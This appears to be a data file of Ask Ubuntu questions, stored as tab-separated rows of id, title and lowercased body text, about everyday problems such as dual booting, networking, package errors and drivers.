434633	gtk theme class of component	i experienced a strange ui after installing numix-daily theme and i want to fix this . the color should not very dark ( it should be grey ) . my question : what is the best way knowing what that ( type or name ) component is ? or what class that component implements ? so that i can change those unmatched color . trial on the file gtk-widget.css line 55 , there a style of background . .background { background-color : @ theme_bg_color ; color : @ theme_fg_color ; } i duplicate this to .background * { background-color : # f00 ; color : @ theme_fg_color ; } and it is changed into red ( but another component too , including text label ) .
434634	wine sound crackling under lubuntu	when i am trying to play the game sins of a solar empire longer then 10 minutes with wine , the sound is beginning to crackle . ( my english is bad , i know ) . i use alsa for the sound in wine .
434635	reinstalling ubuntu via terminal	i 've currently encountered some issues with ubuntu causing me to be stuck in tty mode . i already tried fixing the issue but since i 'm not sure of what really happened for this issue to occur i now just want to reinstall ubuntu . i was wondering if there is a way to reinstall ubuntu via terminal ? i 'm currently running 12.04.4 lts and i already tried the command line : sudo dpkg-reconfigure -phigh -a but that did n't do anything ( after ~10 min of nothing happening a new command line appeard , i tried to restart but nothing changed ) any help is highly appreciated thanks
434639	12.04 ca n't connect to 64 bit wep	i 'm an absolute beginner to linux , and i already have a problem . go me ! i have installed ubuntu 12.04 32 bit on my desktop pc , dual booted with my previously installed windows xp . i have a 64 bit wep encrypted wireless connection that i ca n't change because i want to connect my dsi and wii to the internet and they only accept 64 bit wep encryption . on windows xp i can connect with no problem at all , but on ubuntu it tries to connect , but after a few minutes asks again for my password . i checked it many times , and it 's entered 100 % correctly . i have searched all over the internet for possible solutions , since it seems to be a very common problem , but nothing i tried worked . so , any suggestions from someone more experienced than me would be extremely appreciated . thank you in advance . : - )
434654	can you add a startup and a shutdown sound ?	i recently installed ubuntu 12.04 lts and was wondering if there was any way to insert a startup and shutdown sound ( ideally using a piece of software ) . if anybody has any ideas , they would be much appreciated .
434655	how do i add a new user with specific configuration files ?	i am new to ubuntu and *nix oses . i have just installed the latest stable version of ubuntu on my computer . during the installation process , i created a user account . let us call it n1 . just to try it out , i added a new user account . let us call it n2 . however i noticed that n2 inherited all the applications and the file system of n1 . i would like n2 to have a separate file system with a separate iptables , sources list , etc ... ( different from n1 ) . and when i make changes to , for example , the iptables of n1 , they will not be reflected in n2 ( and vice versa ) . how do i go about doing it ?
434657	acer aspire one 751h multimedia support	i have installed ubuntu 12.04 on my acer aspire one 751h netbook . recently i updated my linux kernel to 3.11.08-18 . thankfully my video works awesome , but there is no sound . i have realtek audio hardware and dolby speakers . earlier in kubuntu 12.10 with kernel 3.5 series it worked out of the box .
434658	how to dual boot ubuntu with windows 7	hi i have total 3 partition in windows7 ( c ) os ( d ) erase all contnet for ubuntu ( e ) for files i want to install ubuntu on d drive . how to install ubuntu here ? and after installing ubuntu here is the left partition become 2 only in windows . please help me .
434659	ubuntu 13.10 touchpad problem	hey guys i have problem with my laptop in ubuntu , i do n't know how exactly to describe it . every time i the cursor with touch pad and stops its will automatically do a right mouse click , also when i click the right mouse button it will take a second to start dragging ? ! ! ? sorry for the bad description if there any outputs please tell me what to do because i do n't know how to deal with such things .
434660	disable internet connection from terminal !	the connect automatically option is allowed for my wired `` wired connection 1 '' . disconnecting the connection works when i do it from the panel 's network - > disconnect menu . but when i do that with command : nmcli con down id `` wired connection 1 '' no sooner than it disconnects , the connection is back on . how does network - > disconnect work ? could we do the same with nmcli without disabling the automatic connection ? note : nmcli con down id `` wired connection 1 '' works as with automatic connection disabled ( but again that 's not an option ) , sudo is not pereferred ( would n't be good to implement in a script ! ) .
434662	rhythmbox disorders album artworks in ipod and wo n't add other information	i 'm relatively new using ubuntu ( i 'm running 13.10 ) , and i have used rhythmbox to reproduce my music . the problem comes when adding songs to my ipod nano 5th gen . i do what most rhythmbox users do : click , drag and drop the song to the ipod . when i finish doing it and eject my ipod , all the album artworks are messed up ( for example , coldplay 's songs with katy perry artworks ) , and my ipod wo n't even show the new songs ( althoug rhythmbox can actually find them in the ipod when it is connected ) how can i fix it ? thanks ! : )
434667	system do n't recognize ubuntu partition `` '' all boot options are tried . press f4 key to recover . ''	i just formatted my samsung ultrabook and installed ubuntu 12.04 via usb using rufus to create the bootable usb ( my ultrabook do n't have a cd/dvd reader ) . the problem is , when the instalation finish and ask for a reboot , it skips the hdd boot and start via usb right away , and when i remove the usb it says `` all boot options are tried . press f4 key to recover ... '' wich i suppose says that i do n't have a valid os installed in my hdd . i reinstalled in the same partition overwriting the former ubuntu installation ( the live cd recognized the previous installation ) . same problem . after that i followed the instructions from here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows and the same happened . i do n't know what to do , and i ca n't use my ultra anymore . help pls ! edit : i tried installing windows 7 in half my hdd . everything ok . but when i installed ubuntu in the other half , i ca n't access to any of them . at startup says : '' error : file not found . grub rescue > '' however , i can access both os with the bootable super grub disk in my pendrive . using the super grub i managed to install lilo in my ubuntu partition . after installing lilo , the computer booted normally only windows 7 . with further google hunting i read that this can be a grub problem , and messed up with grub settings via terminal . after that i ca n't access any os , neither i can get to boot with lilo ( ca n't find config files ) . now i know it 's a problem with the boot files , not the ubuntu partition . what can i do ? is there any other boot type that may work for me ?
434668	wired connection stops working	ok so i just downloaded ubuntu 12.04 onto and old dell inspiron 9300 and i need wired internet so i can download the appropriate wireless drivers . the problem being , the wired connection dies after a couple minutes . it works fine for a couple minutes then says `` no network devices available '' . i have tried restarting network manager many times and several other solutions on this site , but none work . please help . ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope host up loopback running mtu:65536 metric:1 rx packets:84 errors:0 dropped:0 overruns:0 frame:0 tx packets:84 errors:0 dropped:0 overruns:0 frame:0 collisions:0 txqueuelen:0 rx bytes:5806 ( 5.8 kb ) tx bytes:5606 ( 5.8 kb ) ifconfig eth0 eth0 : error fetching interface information : device not found /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp if theres anything else please tell me
434669	cursor blinking with displaylink	i just got my displaylink monitor ( lenovo lt1421 ) running on my ubuntu 13.10 laptop . with the help of some really helpful tutorials from archlinux ( https : //bbs.archlinux.org/viewtopic.php ? id=164385 ) i got it working . but one problem remains : my cursor blinks and even disappears sometimes . the strange thing is , this happens on my built-in laptop screen not the displaylink monitor . this problem even remains if i set the displays to mirrored . then the mouse on my laptop monitor blinks and on the secondary monitor everything remains normal . i searched for solutions and found answers like this : mouse cursor flickering and disappearing this answer suggests i should disable an `` unknown monitor '' . but in my case there is no `` unknown monitor '' . instead i see my displaylink monitor . when i disable/disconnect my displaylink monitor the cursor works fine . but as you can guess this is n't what i 'm aiming for . ; ) any help , ideas or suggestions ? for completeness here are the commands i run after startup to enable the displaylink monitor : 1 # stop display 2 xrandr -- output dvi-0 -- off 3 4 # create new mode generated with 5 # gtf 1366 768 60.0 6 xrandr -- newmode `` 1368x768_60.00 '' 85.86 1368 1440 1584 1800 768 769 772 795 -hsync +vsync 7 8 # add new mode 9 xrandr -- addmode dvi-0 1366x768_60.00 10 11 # tell xrandr to start display with new mode 12 xrandr -- output dvi-0 -- mode 1366x768_60.00 -- right-of lvds1
434670	ca n't boot to windows 8 after installing ubuntu	first of all , i know a lot of people has asked this question , but after revising a lot of questions , i did n't find my answer so i ask here because i 'm desesperated and i need a solution ... here 's my problem : i have windows 8.1 preinstalled in my pc , and i 've also installed ubuntu 12.04 . firstly , when i installed it , it worked perfectly and i did n't have any problem running the two os . but , lately , this last week , it gave me some errors because i could n't start ubuntu , so i reinstalled it . the problem now is that when i try to access my windows 8.1 , it gives me this error : error : no boot disk has been detected or the disk has failed . when i enter my bios settings , it successfully shows the windows boot manager under the boot menu options , but when i try to access it , it gives me that error . also , i 've tried to solve the problem with the windows 8 recovery mode but it does n't detect my os ... i know my hard drive is working , because i can access to my ubuntu and i can also access my windows 8 files through ubuntu . i 've found this guide but i 'm not sure if it 's what i have to do , is it ? if this could solve my problem , i 'm stucked in the first step where i have to assign my efi partition a drive letter , because i do n't know which volume is my efi partition . here is a view of what i see in my recovery console so , i would appreciate it a lot if you could help me because i really need to access my windows 8.1 without losing any data ... thanks !
434672	can not acquire dhcp address	i am unable to acquire a wired dhcp ip address . i have ubuntu 13.10 installed on a thin mini-itx ecs q77h2-ti motherboard . i 'm connecting to my cable modem which does provide ip addresses to other ( windows , mac osx ) machines i 've connected to it . when i run ifconfig i see : eth1 link encap : ethernet hwaddr 74:27 : ea : c2:62:58 inet6 addr : fe80 : :7627 : eaff : fec2:6258/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:267 errors:0 dropped:0 overruns:0 frame:0 tx packets:516 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50017 ( 50.0 kb ) tx bytes:111906 ( 111.9 kb ) interrupt:20 memory : f7c00000-f7c20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1624 errors:0 dropped:0 overruns:0 frame:0 tx packets:1624 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:132240 ( 132.2 kb ) tx bytes:132240 ( 132.2 kb ) cat /etc/network/interfaces gives : auto lo iface lo inet loopback when i try tcpdump -i eth0 -n , i see nothing , but tcpdump -i eth1 -n , i see plenty of activity when wired . i would love some pointers on how to get this machine connected to the internet . cheers , owen .
434675	java 7 installation error	i 'm getting this output when i try to install oracle-java7 from webupd8 ppa download done . removing outdated cached downloads ... sha256sum mismatch jdk-7u51-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up gsfonts-x11 ( 0.22 ) ... errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
434676	increasing partition ubuntu partition size	i have looked at multiple questions similar to mine but they did n't help me , i am going ahead and asking my own . i have done things like running the df command and viewing my partition through gparted . the df command and saw that ubuntu is on /dev/loop0 . it is 97 % full and i would like to increase the space alloted to ubuntu . i have already run commands to free up space and used bleachbit and this is as far as it goes . my gparted window shows : fat16 dellutility 100.94mb 9.25mb unallocated 2.02mb - ntfs recovery 19.53 gb 8.62gb ntfs /host os 345.73gb 129.60gb extended 333.27 gb - ntfs new volume 333.27gb 302.85gb unallocated 1.87mb so what exactly do i need to do to increase the paritition available to ubuntu.i think it currently has about 4.8 gb of space allotted to it . i have also briefly gone through guides to repartitioning for ubuntu but i could not follow the instructions . thanks for your help .
434677	how to recursively upload a directory to a ftp server but skip hidden dot-directorys	i have found that ncftp has this ability to recursive upload directorys . my problem now is that my directory contains a .svn and a .git folder that i do not want uploaded . ncftpput -r -v -u `` user '' -p `` pass '' ftp.own.com /ftp/folder/to/to/place/local/folder/in /local/folder/to/upload
434680	12.04 grub installation problem	i was installing the ubuntu client to dual boot with windows 8.1 , i got to the first step ( try ubuntu without installing , install ubuntu , and check disc for defects ) . i pressed install ubuntu and after a while , it came up with the message : error : could n't read file . error : you need to load the kernel first . what do i do ?
434684	is my bios raid 1 set up correctly ( gparted warning message ) ?	i have set up a raid 1 configuration on click bios ii running on a msi motherboard ( z77a-g43 ) . it uses two 2tb hard drives of equal sizes . after setting up the bios settings , i had the option to configure the raid settings from the `` intel rapid storage technology '' rom . the raid 1 configuration uses the full capacity of both drives . ( is it possible to use only an equal portion of each ? ) i then booted into ubuntu 13.10 from a usb , and opened gparted to partition the drive . i was presented with following libparted warning : /dev/mapper/isw_bfhabgcfge_raid1 contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? can i safely continue ? do i need a valid fake msdos partition table ? what is the recommended course of action from here ? thanks
434686	no matter what desktop environment , how do i get a permanent global application menu ?	permanent global application menu somehow ? doesn’t have to be unity , but should work in 12.04 or newer . permanent means : one which doesn’t disappear after two seconds . global application menu means : the application menu is not in it’s window but in a ( top- ) panel . – eats less space if a permanent panel exists and is not full yet ( so the menu fits in there ) .
434695	`` dpkg-source : unrepresentable changes to source '' when trying to debuild a modified package	i downloaded the source to a package using : $ apt-get source gkrellweather i also made sure i had the compile dependencies : $ sudo apt-get build-dep gkrellweather and i tested that it could build fine : $ cd gkrellweather-2.0.8 $ debuild it built a .deb package in the folder above , which i could install using : $ sudo dpkg -i ../gkrellweather*.deb ok so everything is in place . let 's get started ! i opened up the source code in vim and made some changes i wanted . then i tried to rebuild : $ debuild but i got the following error : ... dh_clean : compatibility levels before 5 are deprecated ( level 4 in use ) dpkg-source -b gkrellweather-2.0.8 dpkg-source : warning : no source format specified in debian/source/format , see dpkg-source ( 1 ) dpkg-source : info : using source format `1.0' dpkg-source : info : building gkrellweather using existing gkrellweather_2.0.8.orig.tar.gz dpkg-source : info : building gkrellweather in gkrellweather_2.0.8-2.diff.gz dpkg-source : error : can not represent change to gkrellweather-2.0.8/.gkrellweather.c.swp : binary file contents changed dpkg-source : warning : the diff modifies the following upstream files : grabweather makefile gkrellweather.c dpkg-source : info : use the '3.0 ( quilt ) ' format to have separate and documented changes to upstream files , see dpkg-source ( 1 ) dpkg-source : unrepresentable changes to source dpkg-buildpackage : error : dpkg-source -b gkrellweather-2.0.8 gave error exit status 1 debuild : fatal error at line 1357 : dpkg-buildpackage -rfakeroot -d -us -uc failed why ?
434698	steam launch error	when i try to download steam with ubuntu on my samsung arm it tells me : e : unable to locate package libgl1-mesa-dri : i386 along with : e : unable to locate package libgl1-mesa-glx : i386 and e : unable to locate package libc6 : i386 i do n't know how to fix this but if anyone does please reply
434703	lamp package lamp-server^ , auto enter mysql pw ?	is there a way to pass the desired mysql password to the prompts in the apt-get install lamp-server^ package in a single command line ? note : i tried finding the package repository to read up on it , but i ca n't find it .
434705	additional drivers to ubuntu 13.10	hi im new at this ubuntu way of life , i got and install ubuntu 13.10 saucy salamander , i dont know where but get kind of lost in the installing process . i got a lot of problems getting the music been able to play , movies in the other hand i cant get it right , already done the `` things to do after installing ubuntu '' list and didnt work for movies , additionals drivers or codecs needed ? where can i find it ? can someone please help : ( im thinking to reinstall everything al over again : | . thank you all in advance for your suggestions : d
434707	can not get asus laptop to correctly wake up from suspend mode	i have asus x53s laptop running ubuntu 12.04 . on my previous 12.04 installation , suspend was working . now , after waking up from suspend mode , all i got , was a blank screen . what i 've tried so far : the script mentioned here adding acpi_osi=linux at grub_cmdline_linux= '' '' adding quiet splash nolapic at grub_cmdline_linux_default= '' '' after these , i ran sudo update-grub also , disabled , requesting password after wake up results : now , the screen after wake up is n't blank , but it 's the last screen that was displayed before the suspend ( probably ) . moving the mouse , shows nothing - which is , the display is dead . some progress : switching to tty1 ( ctrl + alt + f1 ) got me at a terminal with a working screen . from which i could use sudo lightdm restart , which did nothing . after that , i typed who and saw that my user was connected to tty7 , so i changed to it , and voila , i have now access to my session , as it was before the suspend . but with problems : probably the graphics are messed up . the border of the right click dialog is a thick white one ( about 4mm ) . my wallpaper does n't show up , and instead i get this : look the wallpaper , and also , the border of the terminal window . on a sidenote , my laptop has a nvidia gtx520m gpu ( with the `` great '' optimus technology ) . some related info : running additional drivers program , i see that the version 331 of nvidia driver is activated and currently in use i remember that at my previous installation i had installed bumblebee . should i try deactivating the proprietary driver , removing it , and then installing bumblebee ?
434709	how to get ubuntu installer to sense windows 8.1 as an os	when i go to install ubuntu so i can dual boot ubuntu with windows 8.1 on my toshiba satellite c55 the ubuntu installer does not sense my pre-installed windows 8 . i referred to these guides : uefi and installing ubuntu on pre-installed-windows8 64bit system , but the first link suggests , to use the install ubuntu along sideoption or make an efi partition however it also says to only have one efi partition on the hard drive and windows is in an efi partition . so i need to know how to get ubuntu to sense windows 8.1 or how to manually partition the hard drive so i can dual boot . just so you know i have a kubuntu 13.10 on a disk , ubuntu 13.10 on a disk , and ubuntu 12.04 on a disk . if you need any more tech specifications i can give them to you .
434712	how to recover photos from mtp mounted device ( nexus )	i had a couple of photos on my nexus device which i did n't backup yet and where deleted in a mysterious way ( my mom claim she has nothing to do with it . i wanted to try and recover them and learned about photorec and scalpel . the first didi n't recognized my device as a hard drive , and the second need the block path which i have no idea how to extract . running mount on command line yield mount | grep gvfs gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=y2 ) but i do n't know what to do with this . i 'll appreciate any thought . yotam
434714	how can i fix xfdesktop4 unmet dependencies error ?	why ca n't i install the meta-package for the xfce lightweight desktop environment ? i get this error message : using ubuntu software center , try to install xfdestop4 and get this error : the following packages have unmet dependencies : xfce4 : depends : xfwm4 ( > = 4.10.0 ) but 4.10.0-2ubuntu1 is to be installed depends : xfconf ( > = 4.10.0 ) but 4.10.0-1 is to be installed depends : xfce4-settings ( > = 4.10.0 ) but 4.10.0-1ubuntu2 is to be installed depends : xfce4-panel ( > = 4.10.0 ) but 4.10.0-1ubuntu2 is to be installed depends : xfdesktop4 ( > = 4.10.0 ) but 4.10.0-1ubuntu1 is to be installed depends : xfce4-session ( > = 4.10.0 ) but 4.10.0-1ubuntu1 is to be installed depends : xfce4-appfinder ( > = 4.10.0 ) but 4.10.0-1 is to be installed xfwmr = installed xfconf = installed xfce4-settings = installed xfce4-panel : there is already a running instance xfdesktop4 : depends : libwnck22 ( > = 1:2.22 ) but 1:2.30.7-0ubuntu2 is to be installed depends : xfdesktop4-data ( = 4.10.0-1ubuntu1 ) but 4.10.0-1ubuntu1.1 is to be installed libwnck22 = installed xfdesktop4-data = installed etc/apt/sources.list.d contains giuseppe-iuculano-ppp-quantal.list giuseppe-iuculano-ppp-quantal.list.save edited : ptosis @ ptosis-hp-elitebook-6930p : ~ $ software-properties-gtk gpg : /tmp/tmp9mk_yt/trustdb.gpg : trustdb created ptosis @ ptosis-hp-elitebook-6930p : ~ $ sudo apt-get clean ptosis @ ptosis-hp-elitebook-6930p : ~ $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done ptosis @ ptosis-hp-elitebook-6930p : ~ $ ^c ptosis @ ptosis-hp-elitebook-6930p : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done and now i was able to install xfdesktop without errors . found this solution @ how-do-i-resolve-unmet-dependencies
434715	sis 191 network adapter in lubuntu	i have just installed lubuntu 13.10 on my desktop computer . my sis 191 gigabit ethernet adapter is connected to a dsl router . the bottom left of my screen shows that i 'm connected to wired connection 1 . yet when i launch firefox to open its home page , it shows : `` server not found , firefox ca n't find server at google.com '' . i have downloaded network manager to no avail . how to fix this ?
434719	how to fix invisible unity panel , launcher and dash in a vm ?	i 've got ubuntu 13.10 installed on my laptop 's physical drive . system can be booted as a standalone os through neogrub . it 's also attached to a virtualbox machine in windows host using a raw vmdk file . it worked perfectly until recently . i have n't started the vm for a while , but i 've been using ubuntu on bare metal . today i have started the vm and it booted correctly , but unity panel and launcher were invisible . panel 's shadow is visible , though , and both panel and launcher are clickable . here 's a screenshot with the menu opened by clicking where the appropriate icon should be : i have n't changed any unity settings recently . the os was installed on a clean partition , not upgraded from previous versions . everything is up to date . virtualbox additions are installed . i 've got dedicated nvidia gpu , but nouveau is blacklisted and ubuntu is using intel 's integrated gpu when running on bare metal . no nvidia drivers are installed . this setup worked before . all required partitions ( / , /home and swap ) are attached to the vm . raw vmdks present real partition layout to guests , so it 's probably not a culprit . /home is accessible and free -m shows that swap is available . all other windows show up correctly . opengl and unity are enabled in ccsm . re-enabling unity does n't fix the problem . ( suggested here ) removing ~/.compiz and ~/.config/compiz-0 followed by sudo service lightdm restart did n't work too . the file ~/.drirc mentioned here does n't exist . the problem appears only in the vm . everything is fine when running on bare metal . disabling accelerated 3d in vm settings helps , but performance is terrible . i consider it a workaround , not a solution . i recall this happened before when i was trying to run ubuntu in a pure vm ( with a virtualized hard disk image ) after installing vbox addons . it started to work later , thanks to some update i guess . can this problem be fixed without waiting for patches to appear ?
434723	gnome-flashback panel resizing problem	when i try to resize the bottom panel , it shows a white background under the panel . i ca n't show you a screenshot because i tried taking one , and it did n't show the white background underneath the bottom panel .
434727	i dual installed ubuntu and now ca n't access windows 8	when i try to start window8 boot from the start up menu i get the error file roadmap does n't exist how can i fix this and access my windows8 ?
434730	unable to set the hud launcher key	i was finding that the left alt key for opening the hud was not working , so i went to keyboard shortcuts to re-set it . selecting the shortcut to set it and pressing the alt key just sets it to 'disabled ' , however . how can this be fixed ?
434731	how to install a star tsp-600 printer driver ?	i am trying to get my printer ( star tsp-600 ) to work on ubuntu 12.04 . i found this page that suggested the following : # get the cups development headers needed to compile the drivers sudo apt-get install libcups2-dev libcupsimage2-dev # download and extract the drivers from star wget http : //www.starmicronics.com/download/drivers/starcupsdrv-3.0.0_linux.zip unzip starcupsdrv-3.0.0_linux.zip cd starcupsdrv-3.0.0_linux/sourcecode tar -xzf starcupsdrv-src-3.0.0.tar.gz cd starcupsdrv # build and install the drivers make sudo make install for ubuntu 11.x and up , you need to modify the makefile , at lines 15 and 16 . in both cases , you need to correct the path for cups files ... correct location is /usr/lib/x86_64-linux-gnu however , when i run make , i get the following error : make : * [ rastertostar ] error 1 what should i do ?
434732	reinstall ubuntu	i am using ubuntu alongside windows 7 . and my system does not allow me to part my disk more than 4 partition . and i want to delete ubuntu and reinstall it again . but this case i want to give it more space and swap space . how can i do this correctly and without risk .
434733	how to save text buffer to file using python and gtk ?	i am trying to create a text editor for ubuntu ( going to give it a try ! ) using gtk2 and python . so far i have been able to implement the open function . however i just do n't know how i can get the contents of the textview and write them into a file ( the user would have named and decided which directory to save it in ) . here is the code for the gtk.filechooserdialog save function : def on_savebutton_clicked ( widget ) : print 'savebutton clicked' savechooser = gtk.filechooserdialog ( title='save file ' , action=gtk.file_chooser_action_save , buttons= ( gtk.stock_cancel , gtk.response_cancel , gtk.stock_save , gtk.response_ok ) ) filter = gtk.filefilter ( ) filter.set_name ( 'all files ' ) filter.add_pattern ( '* ' ) savechooser.add_filter ( filter ) pyfilter = gtk.filefilter ( ) pyfilter.set_name ( 'python source file ' ) pyfilter.add_pattern ( '*.py ' ) savechooser.add_filter ( pyfilter ) rbfilter = gtk.filefilter ( ) rbfilter.set_name ( 'ruby source file ' ) rbfilter.add_pattern ( '*.rb ' ) savechooser.add_filter ( rbfilter ) cppfilter = gtk.filefilter ( ) cppfilter.set_name ( 'c++ source file ' ) cppfilter.add_pattern ( '*.cpp ' ) savechooser.add_filter ( cppfilter ) response = savechooser.run ( ) if response == gtk.response_ok : filename = savechooser.get_filename ( ) print filename , 'selected . ' elif response == gtk.response_cancel : print 'closed , file not saved . ' savechooser.destroy ( ) does anyone have any ideas ?
434734	new installation of 12.04.4 results in `` low graphics mode ''	i just installed ubuntu 12.04.4 . i am replacing winxp . i installed on a clean hard drive . i have the problem `` system running in low graphics mode '' . i have read many posts about this problem . i may need to install a driver for my ati graphics card . how do i do this ? so far all i have been able to do is enter my user name and password .
434736	synps/2 synaptics touchpad not working with ubuntu 13.10	i have installed ubuntu 13.10 on my laptop which is a make of fujitsu . the touchpad is not working on this and i have searched ubuntu forums and askubuntu but i am not able to make it work with the provided solutions . here is my xinput list > mohit @ mohit-lifebook-uh552 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02e3 id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02b1 id=9 [ slave keyboard ( 3 ) ] ↳ power button id=10 [ slave keyboard ( 3 ) ] ↳ fj camera id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] after the provided solution , the synaptics touchpad disappears from the list ( still it does not work ) mohit @ mohit-lifebook-uh552 : ~ $ sudo modprobe -r psmouse mohit @ mohit-lifebook-uh552 : ~ $ sudo modprobe psmouse proto=imps mohit @ mohit-lifebook-uh552 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02e3 id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02b1 id=9 [ slave keyboard ( 3 ) ] ↳ power button id=10 [ slave keyboard ( 3 ) ] ↳ fj camera id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] is there any solution for this ?
434737	unable to run tor browser	downloaded , extracted , and executed , then i got `` tor unexpected exited '' . here are some terminal stuffs : tor-browser_en-us $ ./start-tor-browser launching tor browser bundle for linux in /home/jackbutton/downloads/tor-browser_en-us ( process:6331 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( process:6331 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed tor browser exited cleanly .
434740	what app should i get to help open starmade/minecraft	i have downloaded starmade ( minecraft in space basically ) and i want to open it but i do n't know what to use or download to play it . the default is squeeze but that does n't do anything .
434742	can not install python3 after dist-upgrade	how can i install python3 ? i try to install python3 like this : sudo apt-get install python3 but i get the error below : reading package lists ... done building dependency tree reading state information ... done python3 is already the newest version . the following packages were automatically installed and are no longer required : apport-symptoms caribou digikam-data enblend enfuse finger gcc-4.7-base : i386 gir1.2-accounts-1.0 gir1.2-gdata-0.0 gir1.2-goa-1.0 gir1.2-muffin-3.0 gir1.2-signon-1.0 gnome-applets-data gnome-media gstreamer0.10-gconf icoutils kde-runtime-data kipi-plugins-common lib32z1 libc6-i386 libgnome-media-profiles-3.0-0 libkactivities-bin libkactivities6 libkcalcore4 libkdcraw-data libkdcraw21 libkdeclarative5 libkdesu5 libkdnssd4 libkexiv2-11 libkexiv2-data libkface-data libkface1 libkgeomap-data libkgeomap1 libkipi-data libkipi9 libkmediaplayer4 libknotifyconfig4 libksane-data libksane0 libkvkontakte1 libkxmlrpcclient4 liblensfun-data liblensfun0 libmail-sendmail-perl libmarblewidget14 libmediawiki1 libmuffin0 libnemo-extension1 libnepomuksync4 libntrack-qt4-1 libntrack0 libopencv-calib3d2.3 libopencv-core2.3 libopencv-features2d2.3 libopencv-flann2.3 libopencv-highgui2.3 libopencv-imgproc2.3 libopencv-legacy2.3 libopencv-objdetect2.3 libopencv-video2.3 libplasma3 libplot2c2 libqapt-runtime libqapt1 librpmbuild3 librpmsign1 libsys-hostname-long-perl libthreadweaver4 muffin-common ncurses-term nepomuk-core ntrack-module-libnl-0 oxygen-icon-theme pax plasma-scriptengine-javascript po-debconf python-gpgme python-lxml rpm shared-desktop-ontologies use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 21 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python3.3-minimal ( 3.3.2-7ubuntu3.1 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.2-7ubuntu3.1 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.2-14ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-gi : python3-gi depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . python3-gi depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-gi depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . dpkg : error processing python3-gi ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-dbus : python3-dbus depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . python3-dbus depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-dbus ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of bluez : bluez depends on python3-dbus ; however : package python3-dbus is not configured yet . dpkg : error processing bluez ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems 